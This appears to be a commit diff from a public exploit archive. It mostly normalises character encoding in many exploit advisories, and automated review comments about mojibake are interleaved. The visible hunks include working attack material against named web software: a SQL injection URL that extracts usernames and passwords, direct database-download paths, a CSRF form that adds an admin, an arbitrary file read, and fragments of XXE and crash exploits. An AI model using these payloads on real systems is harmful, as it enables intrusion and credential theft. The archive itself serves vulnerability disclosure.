DB: 2015-04-20
11 new exploits
parent 97d2c74d49
commit cc553d1147
2732 changed files with 11180 additions and 10911 deletions
|
@ -44,10 +44,10 @@ High
|
|||
Technical Details & Description:
|
||||
========================
|
||||
1. Arbitrary File Read (Unauthenticated)
|
||||
It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.
|
||||
It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.
|
||||
|
||||
2. Arbitrary Directory Listing (Authenticated)
|
||||
It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.
|
||||
It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
|
@ -105,9 +105,9 @@ X-Route-Time: 28
|
|||
X-Run-Time: 8090
|
||||
Content-Type: application/json
|
||||
|
||||
{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
|
||||
………
|
||||
{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
|
||||
{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
|
||||
………
|
||||
{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
|
||||
|
||||
|
||||
Solution Fix & Patch:
|
||||
|
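Review bot: in the sample response body, `{“files"` and `{“name"` open with a typographic quote (U+201C) in both the old and the new copy of the line, so the JSON as archived does not parse. If this pass is normalising characters, those two openers should become ASCII `"`; otherwise the file should say that the advisory was published with them.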
@ -120,7 +120,7 @@ The risk of the vulnerabilities above estimated as high and medium.
|
|||
|
||||
Credits & Authors:
|
||||
==============
|
||||
Bilgi Güvenliði Akademisi
|
||||
Bilgi Güvenliði Akademisi
|
||||
|
||||
Disclaimer & Information:
|
||||
===================
|
||||
|
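Review bot: the credit line reads `Bilgi Güvenliði Akademisi` in both the old and the new copy, so the `ð` mojibake survives this change. That byte is `ğ` in ISO-8859-9/Windows-1254 read as Latin-1; if the file is meant to be UTF-8 after this commit, the line should read `Bilgi Güvenliği Akademisi`.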
@ -130,4 +130,4 @@ Domain: http://bga.com.tr/advisories.html
|
|||
Social: http://twitter.com/bgasecurity
|
||||
Contact: bilgi@bga.com.tr
|
||||
|
||||
Copyright © 2014 | BGA
|
||||
Copyright © 2014 | BGA
|
|
@ -1,9 +1,9 @@
|
|||
# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
|
||||
# Date : 9-9-2014
|
||||
# Author : jsass
|
||||
?# Vendor Homepage: ?http://www.posnic.com/?
|
||||
# Software Link:? http://sourceforge.net/projects/stockmanagement/
|
||||
# Version: ?1.02
|
||||
# Vendor Homepage: http://www.posnic.com/
|
||||
# Software Link: http://sourceforge.net/projects/stockmanagement/
|
||||
# Version: 1.02
|
||||
# Tested on: kali linux
|
||||
# Twitter : @KwSecurity
|
||||
# Group : Q8 GRAY HAT TEAM
|
||||
|
|
|
@ -43,7 +43,7 @@ function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detectio
|
|||
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
|
||||
|
||||
// dans tous les cas :
|
||||
echo "<p class='normal'><a class='erreur'> ";
|
||||
echo "<p class='normal'><a class='erreur'> ";
|
||||
$msg = "";
|
||||
|
||||
// test du nom
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
* ----------------------------------------------------------------------------
|
||||
* Description: -
|
||||
* The AIX 5l FTP-Server crashes when an overly long NLST command is supplied -
|
||||
* For example: NLST ~AAAAA...A (2000 A´s should be enough) -
|
||||
* For example: NLST ~AAAAA...A (2000 A´s should be enough) -
|
||||
* The fun part here is that it creates a coredump file in the current -
|
||||
* directory if it is set writable by the logged in user. -
|
||||
* The goal of the exploit is to get the DES encrypted user hashes -
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
==============================================================================
|
||||
[»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
|
||||
[»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
|
||||
==============================================================================
|
||||
[»] FileExecutive Multiple Vulnerabilities
|
||||
[»] FileExecutive Multiple Vulnerabilities
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ FileExecutive v1.0.0 ]
|
||||
[»] Language: [ PHP ]
|
||||
[»] Site page: [ FileExecutive is a web-based file manager written in PHP. ]
|
||||
[»] Download: [ http://sourceforge.net/projects/fileexecutive/ ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ FileExecutive v1.0.0 ]
|
||||
[»] Language: [ PHP ]
|
||||
[»] Site page: [ FileExecutive is a web-based file manager written in PHP. ]
|
||||
[»] Download: [ http://sourceforge.net/projects/fileexecutive/ ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
|
@ -54,23 +54,23 @@ Add/Edit Admin CSRF:
|
|||
<td><input type='checkbox' name='uload' value='1'>Upload</td> <td><input type='checkbox' name='rename' value='1'>Rename</td>
|
||||
<td><input type='checkbox' name='delete' value='1'>Delete</td> <td><input type='checkbox' name='edit' value='1'>Edit</td>
|
||||
<td><input type='checkbox' name='dload' value='1'>Download</td> <td><input type='checkbox' name='chmod' value='1'>Chmod</td>
|
||||
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
|
||||
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
|
||||
<td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr>
|
||||
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Shell Upload:
|
||||
|
||||
[»] By Go To The End Of Page & Browse Your Shell 2 upload it <-=- Remote File Upload Vulnerability
|
||||
[»] By Go To The End Of Page & Browse Your Shell 2 upload it <-=- Remote File Upload Vulnerability
|
||||
|
||||
Local File Disclosure:
|
||||
|
||||
[»] http://localhost/[path]/download.php?file=./LFD <-=- Local File Disclosure Vulnerability
|
||||
[»] http://localhost/[path]/download.php?file=./LFD <-=- Local File Disclosure Vulnerability
|
||||
|
||||
Full Path Disclosure:
|
||||
|
||||
[»] http://localhost/[path]/listdir.php?dir=./FPD <-=- Full Path Disclosure Vulnerability
|
||||
[»] http://localhost/[path]/listdir.php?dir=./FPD <-=- Full Path Disclosure Vulnerability
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
||||
|
|
|
@ -69,12 +69,12 @@ http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connecto
|
|||
|
||||
</td>
|
||||
<td>
|
||||
</td>
|
||||
</td>
|
||||
<td>
|
||||
Current Folder<br />
|
||||
<input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
|
||||
<td>
|
||||
</td>
|
||||
</td>
|
||||
|
||||
<td>
|
||||
Resource Type<br />
|
||||
|
@ -96,16 +96,16 @@ Resource Type<br />
|
|||
<td valign="top">
|
||||
<a href="#" onclick="GetFolders();">Get Folders</a></td>
|
||||
<td>
|
||||
</td>
|
||||
</td>
|
||||
<td valign="top">
|
||||
<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
|
||||
<td>
|
||||
</td>
|
||||
</td>
|
||||
|
||||
<td valign="top">
|
||||
<a href="#" onclick="CreateFolder();">Create Folder</a></td>
|
||||
<td>
|
||||
</td>
|
||||
</td>
|
||||
<td valign="top">
|
||||
<form id="frmUpload" action="" target="eRunningFrame" method="post"
|
||||
enctype="multipart/form-data">
|
||||
|
@ -138,7 +138,7 @@ height="100%"></iframe>
|
|||
|
||||
[~] Special Thanks To My Best FriendS :
|
||||
|
||||
NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
|
||||
NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
|
||||
~~XTerror~~ , __l2o5v4__ , Zend
|
||||
|
||||
[~] IRANIAN Young HackerZ
|
||||
|
|
|
@ -8,7 +8,7 @@
|
|||
# CVE : CVE-2012-2995, CVE-2012-2996
|
||||
|
||||
# Software Description
|
||||
# TrendMicro Interscan Messaging Security is the industry’s most comprehensive
|
||||
# TrendMicro Interscan Messaging Security is the industry’s most comprehensive
|
||||
# mail gateway security. Choose state-of-the-art software or a hybrid solution
|
||||
# with on-premise virtual appliance and optional cloud pre-filter that blocks
|
||||
# the vast majority of spam and malware outside your network. Plus our Data
|
||||
|
|
|
@ -8,37 +8,37 @@
|
|||
|
||||
/*
|
||||
|
||||
????????????????????????????
|
||||
?______¶¶¶¶¶¶______________?
|
||||
?____¶¶¶¶¶¶¶¶¶¶____________?
|
||||
?___¶¶¶¶¶¶¶¶¶¶¶¶¶__________?
|
||||
?__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________?
|
||||
?_¶¶¶¶¶¶¶______¶¶¶_________?
|
||||
?_¶¶¶¶¶¶________¶¶__¶¶_____?
|
||||
?_¶¶¶¶¶¶____________¶¶¶____?
|
||||
?_¶¶¶¶¶_____________¶¶¶¶¶¶_?
|
||||
?_¶¶¶¶¶____________¶¶¶¶¶¶¶_?
|
||||
?_¶¶¶¶¶___________¶¶¶¶¶¶¶__?
|
||||
?_¶¶¶¶¶____________¶¶¶¶¶¶__?
|
||||
?_¶¶¶¶¶_____________¶¶¶¶¶¶_?
|
||||
?_¶¶¶¶¶¶____________¶¶¶_¶¶_?
|
||||
?__¶¶¶¶¶¶______¶¶___¶¶_____?
|
||||
?__¶¶¶¶¶¶¶____¶¶¶__________?
|
||||
?___¶¶¶¶¶¶¶¶¶¶¶¶___________?
|
||||
?____¶¶¶¶¶¶¶¶¶¶____________?
|
||||
?_____¶¶¶¶¶¶¶______________?
|
||||
????????????????????????????
|
||||
████████████████████████████
|
||||
█______¶¶¶¶¶¶______________█
|
||||
█____¶¶¶¶¶¶¶¶¶¶____________█
|
||||
█___¶¶¶¶¶¶¶¶¶¶¶¶¶__________█
|
||||
█__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶_________█
|
||||
█_¶¶¶¶¶¶¶______¶¶¶_________█
|
||||
█_¶¶¶¶¶¶________¶¶__¶¶_____█
|
||||
█_¶¶¶¶¶¶____________¶¶¶____█
|
||||
█_¶¶¶¶¶_____________¶¶¶¶¶¶_█
|
||||
█_¶¶¶¶¶____________¶¶¶¶¶¶¶_█
|
||||
█_¶¶¶¶¶___________¶¶¶¶¶¶¶__█
|
||||
█_¶¶¶¶¶____________¶¶¶¶¶¶__█
|
||||
█_¶¶¶¶¶_____________¶¶¶¶¶¶_█
|
||||
█_¶¶¶¶¶¶____________¶¶¶_¶¶_█
|
||||
█__¶¶¶¶¶¶______¶¶___¶¶_____█
|
||||
█__¶¶¶¶¶¶¶____¶¶¶__________█
|
||||
█___¶¶¶¶¶¶¶¶¶¶¶¶___________█
|
||||
█____¶¶¶¶¶¶¶¶¶¶____________█
|
||||
█_____¶¶¶¶¶¶¶______________█
|
||||
████████████████████████████
|
||||
|
||||
Plesk SSO XXE injection (Old bug) Exploit
|
||||
Coded by z00 (electrocode)
|
||||
Twitter: electrocode
|
||||
|
||||
Not: Tor kurulu de?ilse proxy kismini kaldirin
|
||||
Not: Tor kurulu değilse proxy kismini kaldirin
|
||||
|
||||
Bug founded http://makthepla.net/blog/=/plesk-sso-xxe-xss
|
||||
|
||||
|
||||
Tüm ?slam Aleminin Beraat gecesi mubarek olsun dua edin:)
|
||||
Tüm İslam Aleminin Beraat gecesi mubarek olsun dua edin:)
|
||||
|
||||
*/
|
||||
function Gonder($domain,$komut,$method){
|
||||
|
|
|
@ -227,7 +227,7 @@ Android 4.2.2.
|
|||
|
||||
/-----
|
||||
I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00
|
||||
p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬'
|
||||
p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬'
|
||||
config_methods=0x188 dev_capab=0x21 group_capab=0x0
|
||||
E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS:
|
||||
WifiMonitor
|
||||
|
|
|
@ -104,4 +104,4 @@ def main(phone):
|
|||
password = base64.b64decode(password)
|
||||
|
||||
# Custom message that will crash WhatsApp
|
||||
message = message = "#RemoteExecution?
|
||||
message = message = "#RemoteExecution
|
|
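Review bot: on the `message = message = "#RemoteExecution` line the new copy deletes the trailing `?` rather than restoring whatever character it stood for, and the string literal has no closing quote on the visible line in either copy. If the `?` was a placeholder for a non-ASCII character, dropping it alters the archived file instead of repairing it, so this line should be checked against the original submission. The redundant double assignment `message = message =` is carried over unchanged and could be noted at the same time.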
@ -31,6 +31,6 @@
|
|||
## I Love You **** ##
|
||||
#####################################################################
|
||||
|
||||
© aFiR.Me - 0nly F0r Security 2009 | By Mr.aFiR
|
||||
© aFiR.Me - 0nly F0r Security 2009 | By Mr.aFiR
|
||||
|
||||
// Exploit End.
|
|
@ -1,25 +1,25 @@
|
|||
===========================================================================
|
||||
===
|
||||
[»] ~ Note : Hacker R0x Lamerz Sux !
|
||||
[»] ~ Note : Hacker R0x Lamerz Sux !
|
||||
===========================================================================
|
||||
===
|
||||
[»] DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection
|
||||
[»] DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection
|
||||
Vulnerability
|
||||
===========================================================================
|
||||
===
|
||||
[»] my home: [ Hackteach.org ]
|
||||
[»] Script: [ DesigNsbyjm Cms 1.0 ]
|
||||
[»] Language: [ PHP ]
|
||||
[»] Home: [ http://designsbyjm.net/ ]
|
||||
[»] Founder: [ Red-D3v1L < No Email :d < ]
|
||||
[»] Gr44tz to: [ Hackteach Team - H1s0k4 - SkuLL-HaCkEr
|
||||
[»] my home: [ Hackteach.org ]
|
||||
[»] Script: [ DesigNsbyjm Cms 1.0 ]
|
||||
[»] Language: [ PHP ]
|
||||
[»] Home: [ http://designsbyjm.net/ ]
|
||||
[»] Founder: [ Red-D3v1L < No Email :d < ]
|
||||
[»] Gr44tz to: [ Hackteach Team - H1s0k4 - SkuLL-HaCkEr
|
||||
- sec-r1z.com - 0d4y.com ]
|
||||
[»] Fuck to : [ Gaza 5acker << Big Big Big Lamerz ]
|
||||
[»] Fuck to : [ Gaza 5acker << Big Big Big Lamerz ]
|
||||
########################################################################
|
||||
|
||||
===[ Exploit SQL ]===
|
||||
|
||||
[»] [Path]/viewcontent.asp?pageid=[SQL]
|
||||
[»] [Path]/viewcontent.asp?pageid=[SQL]
|
||||
|
||||
http://server/viewcontent.asp?pageid=-9+union+select+1,2,3,4,
|
||||
password,6,username,8,9,10,11,12,13+from+user
|
||||
|
|
|
@ -20,10 +20,10 @@
|
|||
|
||||
===[ Exploit SQL Bypass ]===
|
||||
|
||||
[»] Go to : [Path]/admin
|
||||
[»] Go to : [Path]/admin
|
||||
|
||||
[»] Add : siteConfig.asp
|
||||
[»] Add : siteConfig.asp
|
||||
|
||||
[»] dem0 :
|
||||
[»] dem0 :
|
||||
|
||||
http://server/admin/siteConfig.asp
|
|
@ -7,22 +7,22 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ~ Note : Thx 2 Egyptian National Team
|
||||
[»] ~ Note : Thx 2 Egyptian National Team
|
||||
==============================================================================
|
||||
[»] Codefixer Membership Remote Database Disclosure Vulnerability
|
||||
[»] Codefixer Membership Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ Codefixer Membership ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ ASP membership management script system ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ Codefixer Membership ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ ASP membership management script system ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://[target].com/[path]/members.mdb
|
||||
[»] http://[target].com/[path]/members.mdb
|
||||
|
||||
Author: ViRuSMaN <-
|
|
@ -7,24 +7,24 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ~ Note : Thx 2 Egyptian National Team
|
||||
[»] ~ Note : Thx 2 Egyptian National Team
|
||||
==============================================================================
|
||||
[»] Free ASP GuestBookPro Script Remote Database Disclosure Vulnerability
|
||||
[»] Free ASP GuestBookPro Script Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ GuestBookPro ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Codefixer GuestBookPro - Free ASP GuestBook Script ]
|
||||
[»] Download: [ http://www.codefixer.com/app_guestbookpro/default.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ GuestBookPro ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Codefixer GuestBookPro - Free ASP GuestBook Script ]
|
||||
[»] Download: [ http://www.codefixer.com/app_guestbookpro/default.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://[target].com/[path]/db/guestbook.mdb
|
||||
[»] http://[target].com/[path]/db/guestbook.mdb
|
||||
|
||||
|
||||
Author: ViRuSMaN <-
|
|
@ -7,24 +7,24 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ~ Note : Thx 2 Egyptian National Team
|
||||
[»] ~ Note : Thx 2 Egyptian National Team
|
||||
==============================================================================
|
||||
[»] Toast Forums v1.8 Database Disclosure Vulnerability
|
||||
[»] Toast Forums v1.8 Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ Toast Forums v1.8 ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Toast Forums World's first user-skinnable message board! ]
|
||||
[»] Download: [ http://www.toastforums.com/download/ ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ Toast Forums v1.8 ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Toast Forums World's first user-skinnable message board! ]
|
||||
[»] Download: [ http://www.toastforums.com/download/ ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://[target].com/[path]/data/data.mdb
|
||||
[»] http://[target].com/[path]/data/data.mdb
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -16,23 +16,23 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Forever RevengeHack.Com
|
||||
[»] ~ Note : Forever RevengeHack.Com
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»] Angelo-emlak v1.0 Database Disclosure Vulnerability
|
||||
[»] Angelo-emlak v1.0 Database Disclosure Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ angelo-emlak v1.0 ]
|
||||
[»] Script: [ angelo-emlak v1.0 ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com (Mail Gonderenin aq... :D ]
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com (Mail Gonderenin aq... :D ]
|
||||
|
||||
[»] My Home: [ RevengeHack.com , Ar-ge.Org]
|
||||
[»] My Home: [ RevengeHack.com , Ar-ge.Org]
|
||||
|
||||
|
||||
|
||||
|
@ -44,12 +44,12 @@
|
|||
|
||||
|
||||
|
||||
[»] http://[target].com/[path]/veribaze/angelo.mdb
|
||||
[»] http://[target].com/[path]/veribaze/angelo.mdb
|
||||
|
||||
|
||||
|
||||
|
||||
[»] ( c ) DesignAndCodeBy:Angelo
|
||||
[»] ( c ) DesignAndCodeBy:Angelo
|
||||
|
||||
|
||||
|
||||
|
@ -62,7 +62,7 @@ Thanks You: eXceptioN,CodeInside,CorDoN,Hack3ra,Rex aL0ne,By_HKC
|
|||
|
||||
Ve By_Magic :D
|
||||
|
||||
- Kaderimiz olan aþka deðil de aþkýyla kaderimizi deðiþtirene içelim!
|
||||
- Kaderimiz olan aþka deðil de aþkýyla kaderimizi deðiþtirene içelim!
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -7,24 +7,24 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ~ Note : Some sites may change the path of the "database/NewsPad.mdb" cause the vulnerability not work
|
||||
[»] ~ Note : Some sites may change the path of the "database/NewsPad.mdb" cause the vulnerability not work
|
||||
==============================================================================
|
||||
[»] Web Wiz NewsPad Remote Database Disclosure Vulnerability
|
||||
[»] Web Wiz NewsPad Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ Web Wiz NewsPad ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Web Wiz NewsPad - Free eNewsletter Software Download ]
|
||||
[»] Download: [ http://www.webwizguide.com/webwiznewspad/downloads.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ Web Wiz NewsPad ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Web Wiz NewsPad - Free eNewsletter Software Download ]
|
||||
[»] Download: [ http://www.webwizguide.com/webwiznewspad/downloads.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://[target].com/[path]/database/NewsPad.mdb
|
||||
[»] http://[target].com/[path]/database/NewsPad.mdb
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
||||
|
|
|
@ -7,25 +7,25 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ~ Note : Some forums may change the path of the "database/wwForum.mdb" cause the vulnerability not work
|
||||
[»] ~ Note : Some forums may change the path of the "database/wwForum.mdb" cause the vulnerability not work
|
||||
==============================================================================
|
||||
[»] Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability
|
||||
[»] Web Wiz Forums v9.64 Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ Web Wiz Forums v9.64 ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Web Wiz Forums - Free Forum Software - Free Bulletin Board Software ]
|
||||
[»] Download: [ http://www.webwizguide.com/webwizforums/webwizforums_downloads.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Dork: [ Web Wiz Forums® version 9.64 [Free Express Edition] ]
|
||||
[»] Script: [ Web Wiz Forums v9.64 ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Web Wiz Forums - Free Forum Software - Free Bulletin Board Software ]
|
||||
[»] Download: [ http://www.webwizguide.com/webwizforums/webwizforums_downloads.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Dork: [ Web Wiz Forums® version 9.64 [Free Express Edition] ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://[target].com/[path]/database/wwForum.mdb
|
||||
[»] http://[target].com/[path]/database/wwForum.mdb
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
||||
|
|
|
@ -7,24 +7,24 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ~ Note : if the path of "snitz_forums_2000.mdb" has been changed this exploit will not work
|
||||
[»] ~ Note : if the path of "snitz_forums_2000.mdb" has been changed this exploit will not work
|
||||
==============================================================================
|
||||
[»] Snitz Forums 2000 Remote Database Disclosure Vulnerability
|
||||
[»] Snitz Forums 2000 Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ Snitz Forums ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Snitz Forums 2000 - free ASP-based Internet Discussion Forum Software ]
|
||||
[»] Download: [ http://forum.snitz.com/specs.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ Snitz Forums ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Snitz Forums 2000 - free ASP-based Internet Discussion Forum Software ]
|
||||
[»] Download: [ http://forum.snitz.com/specs.asp ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com , Sec-r1z.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://[target].com/[path]/snitz_forums_2000.mdb
|
||||
[»] http://[target].com/[path]/snitz_forums_2000.mdb
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : jgbbs-3.0 beta 1 |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : PSnews - Copyright (C) 2003 Rich Kavanagh |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
